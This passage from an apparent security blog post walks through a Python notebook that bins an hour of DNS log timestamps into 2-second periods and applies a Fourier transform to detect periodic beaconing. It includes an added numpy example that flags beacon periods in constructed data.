0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;">(1./sampling_period) * 60</span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;"><br /></span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;">0.016666666666666666</span></div></pre></div></div></div><div><br /></div><div><div><div>Which also means, to get any frequency in between, we just multiply by that number of seconds.</div><div>Or for 2 seconds</div></div><div><br /></div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; 
overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;">(1./sampling_period) * 2</span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;"><br /></span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;">0.0005555555555555556</span></div></pre></div></div><div><br /></div><div>Extract the timestamp column and add it to its own Pandas series</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;">tmp_data = df_dns['ts']</span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;">tmp_data, type(tmp_data)
(0 2023-10-01 01:00:00
1 2023-10-01 01:00:00
2 2023-10-01 01:00:00
3 2023-10-01 01:00:00
4 2023-10-01 01:00:00
...
8212 2023-10-01 01:59:57
8213 2023-10-01 01:59:57
8214 2023-10-01 01:59:58
8215 2023-10-01 01:59:59
8216 2023-10-01 01:59:59
Name: ts, Length: 8216, dtype: datetime64[s],
pandas.core.series.Series)</span></div></pre></div></div></div><div><br /></div><div><div>Replace the index column with the timestamp</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">tmp_data.index = tmp_data</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">tmp_data
ts
2023-10-01 01:00:00 2023-10-01 01:00:00
2023-10-01 01:00:00 2023-10-01 01:00:00
2023-10-01 01:00:00 2023-10-01 01:00:00
2023-10-01 01:00:00 2023-10-01 01:00:00
2023-10-01 01:00:00 2023-10-01 01:00:00
...
2023-10-01 01:59:57 2023-10-01 01:59:57
2023-10-01 01:59:57 2023-10-01 01:59:57
2023-10-01 01:59:58 2023-10-01 01:59:58
2023-10-01 01:59:59 2023-10-01 01:59:59
2023-10-01 01:59:59 2023-10-01 01:59:59
Name: ts, Length: 8216, dtype: datetime64[s]</span></pre></div></div></div><div><br /></div></div><div><div>Using knowledge of 2 seconds as was seen via the tcpdump as my guide</div><div>You can try to use 1 second but I don't think it will find anything meaningful. I can be wrong!</div><div>I don't think 1 second would be representative of a real problem</div><div>Set my period of 2 seconds </div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">best_period = '2s' </span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">best_period</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"><br /></span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">'2s'</span></pre></div></div></div><div><br /></div></div><div><div>Get a count of the data points occurring every 2 seconds and print the first 10 entries</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">counts_per_period = tmp_data.resample(best_period).count()</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
# Print the first 10 entries
counts_per_period[:10], len(counts_per_period)
(ts
2023-10-01 01:00:00 30
2023-10-01 01:00:02 13
2023-10-01 01:00:04 7
2023-10-01 01:00:06 2
2023-10-01 01:00:08 4
2023-10-01 01:00:10 4
2023-10-01 01:00:12 15
2023-10-01 01:00:14 2
2023-10-01 01:00:16 1
2023-10-01 01:00:18 1
Freq: 2S, Name: ts, dtype: int64,
1800)</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><br /></pre></div></div></div><div><br /></div><div>Confirm the type is a Pandas Series</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">type(counts_per_period)</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
pandas.core.series.Series</span></pre></div></div></div><div><br /></div><div><div>Take a look inside the keys. This shows the 2 second periods</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">counts_per_period.keys()</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
DatetimeIndex(['2023-10-01 01:00:00', '2023-10-01 01:00:02',
'2023-10-01 01:00:04', '2023-10-01 01:00:06',
'2023-10-01 01:00:08', '2023-10-01 01:00:10',
'2023-10-01 01:00:12', '2023-10-01 01:00:14',
'2023-10-01 01:00:16', '2023-10-01 01:00:18',
...
'2023-10-01 01:59:40', '2023-10-01 01:59:42',
'2023-10-01 01:59:44', '2023-10-01 01:59:46',
'2023-10-01 01:59:48', '2023-10-01 01:59:50',
'2023-10-01 01:59:52', '2023-10-01 01:59:54',
'2023-10-01 01:59:56', '2023-10-01 01:59:58'],
dtype='datetime64[s]', name='ts', length=1800, freq='2S')</span></pre></div></div></div><div><br /></div><div><div>Extract the values occurring at those timestamps</div><div>Let's call it x for now</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">x = counts_per_period.values</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">x
array([30, 13, 7, ..., 1, 19, 3], dtype=int64)</span></pre></div></div></div><div><br /></div></div><div><div>Get the length of x. Because the sampling was done for 1 hour or 3600 seconds, by looking at the data from 2 seconds perspective, we now have 1800 data points</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">len(x)</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
1800</span></pre></div></div></div><div><br /></div><div>Plot the values in x</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">plt.title('Plot of of the values in x')</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">plt.plot(x)
plt.xlabel(xlabel='Time in 2secs window')
plt.ylabel(ylabel='Counts Per Period')
plt.show()
</span></pre></div></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd0fNX2_HECG2ybvU3fpRUj60gZ40gEX1kReUQNERoczdZ_AWDzqkC4WHwoSJNF4UvS7gHmSscknWCWzUska5Ar50y_fIcQwOX38BcnvKizKwH-Jq2Q-iief-QD8LSUfzHrySZH8p59AybQTM94Ch43Xb7rXCI5sjMzMjo9fJisi9GKO7630ofkVHuSOA/s571/samples%20in%202%20seconds%20window.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="571" height="510" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd0fNX2_HECG2ybvU3fpRUj60gZ40gEX1kReUQNERoczdZ_AWDzqkC4WHwoSJNF4UvS7gHmSscknWCWzUska5Ar50y_fIcQwOX38BcnvKizKwH-Jq2Q-iief-QD8LSUfzHrySZH8p59AybQTM94Ch43Xb7rXCI5sjMzMjo9fJisi9GKO7630ofkVHuSOA/w640-h510/samples%20in%202%20seconds%20window.png" width="640" /></a></div><div>From the plot above we can definitely see some spikes. This suggests that some 2-second periods have a large number of counts. </div><div><br /></div><div>Get the Fourier Transform of the signal. Notice the result is an array of complex numbers, each with a real and an imaginary component.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">fourier = np.fft.fft(x)</span>
<span style="color: white;">fourier, len(fourier)</span>
<span style="color: white;">(array([ 8216. +0.j , 1913.98722741 -956.73902893j,</span>
<span style="color: white;"> 18.18684807-1246.50554465j, ..., -1694.41853886 +611.36477164j,</span>
<span style="color: white;"> 18.18684807+1246.50554465j, 1913.98722741 +956.73902893j]),</span>
<span style="color: white;"> 1800)</span>
</pre></div>
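Before plotting the spectrum, here is the whole detection pipeline this section builds up cell by cell (bin the timestamps into 2-second periods, take the real FFT, strip the lowest 10% of frequencies as the DC region, threshold at mean + 2 standard deviations, and map the surviving spikes back to a frequency and a period) as one runnable added example. This is not the post's notebook code: it uses numpy only, with np.bincount standing in for pandas' resample('2s').count(), and it runs on a constructed hour of query timestamps that mixes uniformly random background queries with a beacon firing every 20 seconds. The helper names, the seed, the 20-second period and the background rate are all assumptions made for this example.

```python
"""Beacon hunting with an FFT over per-bin query counts.

Added example (not the post's notebook code): it runs the pipeline the
section walks through - bin timestamps into 2-second periods, take the
real FFT, drop the lowest 10% of frequencies (the DC region), threshold
at mean + 2*std, and map the surviving spikes back to frequencies and
periods - on a constructed hour of DNS query timestamps. The data, the
20-second beacon, the seed and the helper names are assumptions made
for this example; numpy's bincount stands in for pandas' resample().
"""
import numpy as np

HOUR_SECONDS = 3600          # the post's sampling_period
BIN_SECONDS = 2              # the post's best_period ('2s')


def constructed_timestamps(seed: int = 7) -> np.ndarray:
    """Constructed input: one hour of query times in seconds from 01:00.

    1080 background queries at uniformly random times plus a beacon that
    fires every 20 seconds (offset by 3 s), i.e. 180 cycles per hour.
    """
    rng = np.random.default_rng(seed)
    background = rng.uniform(0, HOUR_SECONDS, size=1080)
    beacon = np.arange(3, HOUR_SECONDS, 20, dtype=float)
    return np.sort(np.concatenate([background, beacon]))


def counts_per_period(ts: np.ndarray, bin_seconds: int = BIN_SECONDS,
                      total_seconds: int = HOUR_SECONDS) -> np.ndarray:
    """Equivalent of tmp_data.resample('2s').count(): events per bin."""
    n_bins = total_seconds // bin_seconds
    bins = (ts // bin_seconds).astype(int)
    return np.bincount(bins, minlength=n_bins)[:n_bins]


def fft_spectrum(counts: np.ndarray, bin_seconds: int = BIN_SECONDS,
                 total_seconds: int = HOUR_SECONDS):
    """Amplitudes and their frequencies in cycles per total_seconds.

    rfftfreq gets d = bin_seconds/total_seconds, as the post's later cell
    does, so with 1800 bins the frequencies run 0..900 cycles per hour.
    """
    amplitude = np.abs(np.fft.rfft(counts))
    frequencies = np.fft.rfftfreq(n=len(counts), d=bin_seconds / total_seconds)
    return frequencies, amplitude


def find_beacons(counts: np.ndarray, n_std: float = 2.0,
                 dc_fraction: float = 0.1, total_seconds: int = HOUR_SECONDS):
    """Return [(frequency, period_seconds, amplitude)] for every spike above
    mean + n_std*std of the spectrum with its lowest dc_fraction removed,
    strongest first."""
    frequencies, amplitude = fft_spectrum(counts, total_seconds=total_seconds)
    keep = frequencies > dc_fraction * frequencies.max()   # strip the DC region
    stripped_f, stripped_a = frequencies[keep], amplitude[keep]
    threshold = stripped_a.mean() + n_std * stripped_a.std()
    # Locate spikes with a boolean mask instead of searching the FFT array
    # for a float equal to each strong signal: no float-equality pitfalls
    # and duplicate amplitudes cannot map to the wrong index.
    hits = np.flatnonzero(stripped_a > threshold)
    hits = hits[np.argsort(stripped_a[hits])[::-1]]
    return [(float(stripped_f[i]), total_seconds / float(stripped_f[i]),
             float(stripped_a[i])) for i in hits]


if __name__ == "__main__":
    x = counts_per_period(constructed_timestamps())
    for freq, period, amp in find_beacons(x)[:5]:
        print(f"{freq:6.0f} cycles/hour  period {period:6.1f}s  amplitude {amp:8.1f}")
```

Because rfftfreq is given d = 2/3600, the frequency axis is in cycles per hour and the period in seconds is 3600 divided by the frequency; the constructed beacon shows up at 180 cycles per hour (and at its harmonics 360, 540, 720 and 900), i.e. a 20-second period. A mean + 2σ threshold still lets a few percent of noise bins through, so treat the hits as leads to pivot on in the DNS log (which source host, which query names) rather than as confirmed beacons.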
</div><div><br /></div><div><div>Plot the values as they are, before taking the absolute values. Even though we applied the Fourier Transform, the x axis is still the sample index rather than the frequency. The 1800 at the end of the x axis confirms this; notice the 1800 printed at the bottom of the cell above.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">plt.title(label='Plot before finding the absolute values')</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">plt.plot(fourier)
plt.xlabel(xlabel='samples')
plt.ylabel(ylabel='amplitude before normalize')
plt.show()
C:\Users\SecurityNik\AppData\Roaming\Python\Python39\site-packages\matplotlib\cbook\__init__.py:1340: ComplexWarning:
Casting complex values to real discards the imaginary part</span></pre></div></div></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwZxPJ6oQREpZdTaaPsnZDiVG1Zcs5VjokhREwe2TuJcA4_3t1CgAUBnwZKU425dILQudYSVLfKd54Zjjs0e8WSQ41_wUpFHEuSg-mJZ8mE8T0rmQz2wrXyU_AWx9QqYrT56hcBA0PrWO6wLPIYRiCLCi8-18tPIZ-5p64qZo05ipd0YWS3TAcUGDkHEM/s591/Casting%20Complex%20Compelx%20Number.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="591" height="493" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwZxPJ6oQREpZdTaaPsnZDiVG1Zcs5VjokhREwe2TuJcA4_3t1CgAUBnwZKU425dILQudYSVLfKd54Zjjs0e8WSQ41_wUpFHEuSg-mJZ8mE8T0rmQz2wrXyU_AWx9QqYrT56hcBA0PrWO6wLPIYRiCLCi8-18tPIZ-5p64qZo05ipd0YWS3TAcUGDkHEM/w640-h493/Casting%20Complex%20Compelx%20Number.png" width="640" /></a></div><br /><div><div>Plot the values as is after finding the absolute values. We can see the symmetry in both the graph below and the one above. Even though we used Fourier Transform, the x axis is still the number of samples rather than the frequency. Notice the Y axis also goes to negative values.</div></div></div><div><br /></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">plt.title(label='Amplitude - After finding the absolute values')</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">plt.plot(np.abs(fourier))
plt.xlabel(xlabel='samples')
plt.ylabel(ylabel='amplitude before normalize')
plt.show()</span></pre></div></div></div><div><br /></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizvY4M4FMLw_4Pdzc8yZq8o8AuUYUV2LPrvreHga9y9p8qsxjy5GWl-YHQ4-jd5dJ4-_tpCd_0JmQvMVmtszQ0wMJaS-ruckcXwD98ClDo7ncpbG4bhUwRC3GI8QUeI0W-DD3Ij1_9mC4WqdE4rlrwL0Ahpwct0_5IUG9e5ySN90fu44A5Rzozz1ILsMM/s580/Amplitude%20Absolute%20Values.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="580" height="502" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizvY4M4FMLw_4Pdzc8yZq8o8AuUYUV2LPrvreHga9y9p8qsxjy5GWl-YHQ4-jd5dJ4-_tpCd_0JmQvMVmtszQ0wMJaS-ruckcXwD98ClDo7ncpbG4bhUwRC3GI8QUeI0W-DD3Ij1_9mC4WqdE4rlrwL0Ahpwct0_5IUG9e5ySN90fu44A5Rzozz1ILsMM/w640-h502/Amplitude%20Absolute%20Values.png" width="640" /></a></div><br /><div><div>Let's normalize the FFT output. </div><div>Remember, Shannon Nyquist states if we sample a signal at a rate of at least 2 times the highest frequency, the analog signal can be recovered perfectly</div><div><br /></div><div>At the same time, setup the sampling period. These logs are for an hour 01:00 to 01:59. I am keeping this because my original log was for that period. When we resampled the data above by 2 seconds, it returned 1800 records.</div><div><br /></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">N = len(x)</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">normalize = N/2
sampling_period = 3600
len(x), N, normalize, sampling_period
(1800, 1800, 900.0, 3600)</span></pre></div></div></div><div><br /></div><div><div>Plot the absolute value of the amplitude</div></div><div><br /></div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">plt.title(label='Normalize amplitude values')</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">plt.plot(np.abs(fourier)/normalize)
plt.xlabel(xlabel='samples')
plt.ylabel(ylabel='amplitude after normalization')
plt.show()</span></pre></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2HuN1oyvjsssoWOW4UjlRKQSIqmwaHmXxODdcoDaiVMX5GISgclIs3nzDgIzaJ_foFE0KEd_bBfHLp_CMY1GY4xCV5v1vQ87Cpz-_Ut0dow-SdHUFtMxDTud1W0eqm8EncK0bQtB33MknjFdrEDMMTX4XMyeR2ib3Xco9n8RIaMX6StFzjk5qXkhTKlU/s554/normalized%20amplitude.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="554" height="526" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2HuN1oyvjsssoWOW4UjlRKQSIqmwaHmXxODdcoDaiVMX5GISgclIs3nzDgIzaJ_foFE0KEd_bBfHLp_CMY1GY4xCV5v1vQ87Cpz-_Ut0dow-SdHUFtMxDTud1W0eqm8EncK0bQtB33MknjFdrEDMMTX4XMyeR2ib3Xco9n8RIaMX6StFzjk5qXkhTKlU/w640-h526/normalized%20amplitude.png" width="640" /></a></div><br /><div>Need to fix the frequency. We are sampling at every one second in the hour. This is where I am using the 3600 rather than the 1800</div><div><br /></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">frequency_rate = 1./sampling_period</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">frequency_rate
0.0002777777777777778</span></pre></div></div><div><br /></div></div><div>Get the frequency axis</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">frequency_axis = np.fft.fftfreq(n=N, d=frequency_rate)</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">frequency_axis, len(frequency_axis)
(array([ 0., 2., 4., ..., -6., -4., -2.]), 1800)
</span></pre><div><br /></div></div></div><div><br /></div></div><div><div>With the frequency axis in place, let's plot the frequency axis on its own for now. Notice the Y axis is both positive and negative. Notice it goes from 0 to 1800 which is half of 3600 which is basically half our sampling period. Also notice it goes from 0 to -1800. Did you see the symmetry?</div></div><br /><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;">plt.title('Plot showing both frequency in both negative and positive values')
plt.plot(frequency_axis, lw=3, c='r')
plt.ylabel('amplitude')
plt.xlabel('count of samples');</span></div></pre><div><br /></div></div></div><div><br /></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir-40vjWwAO8rPWhiLqrydwV6y8wY4cSiKMIH-vaNj8NE9B6LJHMeqsc0FZGV_hLkf-Y_tH4cD1RiLN3sW9tsG9xY7-er2ju6MLc_iKZNC7pjYKOWEdsFl-xWYf7i6Gk61BzGCRJOyCo28eSn2f2iYdNIL0atmHg4CzFQK6f-2HCyWrXTW7xLtid_ockY/s616/frequency%20half-way.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="616" height="474" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir-40vjWwAO8rPWhiLqrydwV6y8wY4cSiKMIH-vaNj8NE9B6LJHMeqsc0FZGV_hLkf-Y_tH4cD1RiLN3sW9tsG9xY7-er2ju6MLc_iKZNC7pjYKOWEdsFl-xWYf7i6Gk61BzGCRJOyCo28eSn2f2iYdNIL0atmHg4CzFQK6f-2HCyWrXTW7xLtid_ockY/w640-h474/frequency%20half-way.png" width="640" /></a></div><br /><div>Looking at the symmetry another way: plot the normalized amplitude against the frequency axis. The frequency axis runs from 0 to 1800, which is half of 3600, basically half our sampling period, and from 0 to -1800 on the negative side.</div><div><div>You should be able to see the symmetry now. It is the same as what you saw above,
just from a different perspective.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">norm_amplitude = np.abs(fourier)/normalize</span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">plt.title('Plot showing symmetry of frequencies')
plt.plot(frequency_axis, norm_amplitude)
plt.ylabel('amplitude')
plt.xlabel('Frequencies')</span></div></pre></div></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs4y74xDcGgBr4BCUCfWhFTtrcu6gG8o40zxjkg_HiL41-s7LPQ_MXzws4b1rvWfRxx2e1fBGjBbcim8usIptD0s5DcNxc7gCkwvXIyioy4jZfPNzmE9qgEKdvuTjGD_S3IX6gcbtfrJ8RjF41lLyoF2Ih1FDVxyagShevU3QcP29GZdXpPRQETvzODQY/s554/frequency%20symmetry.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="554" height="526" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs4y74xDcGgBr4BCUCfWhFTtrcu6gG8o40zxjkg_HiL41-s7LPQ_MXzws4b1rvWfRxx2e1fBGjBbcim8usIptD0s5DcNxc7gCkwvXIyioy4jZfPNzmE9qgEKdvuTjGD_S3IX6gcbtfrJ8RjF41lLyoF2Ih1FDVxyagShevU3QcP29GZdXpPRQETvzODQY/w640-h526/frequency%20symmetry.png" width="640" /></a></div><div>Just print the length and frequency values as a refresher for me</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">N, frequency_rate</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
(1800, 0.0002777777777777778)</span></pre></div></div></div><div><br /></div><div>Just getting a better understanding of the lengths</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">len(np.fft.rfft(x)), len(2*np.abs(np.fft.rfft(x))), len(np.abs(np.fft.rfft(x))), N</span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111;"><span style="color: white;">
(901, 901, 901, 1800)</span></span></div></pre></div></div></div><div><br /></div><div>Finalize this code</div><div><br /></div><div>We see that we have also gotten rid of the symmetry and now only have the positive half on the line</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">plt.plot(np.fft.rfftfreq(n=N, d=frequency_rate), 2*np.abs(np.fft.rfft(x))/N)</span></div></pre></div></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Oe7n1MLu_lyyNNGmAcP2a9KR0VzSZf3MXRYef5MBjw7Ud83k7lPAJ9yQZUIYOVTPOH2xTk9K4W6DOB2dhrBnj9Iy92zWvzzvOO30Fdxu5IvyH6nqGvGxcG9daSq9QnYTsmwjorhYeQQ47O6Xw7z-MUwy0PeVW17d6SrfXdqv06RlHV78baOiFdqoy-E/s534/frequency%20symmetry%20broken.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="413" data-original-width="534" height="494" 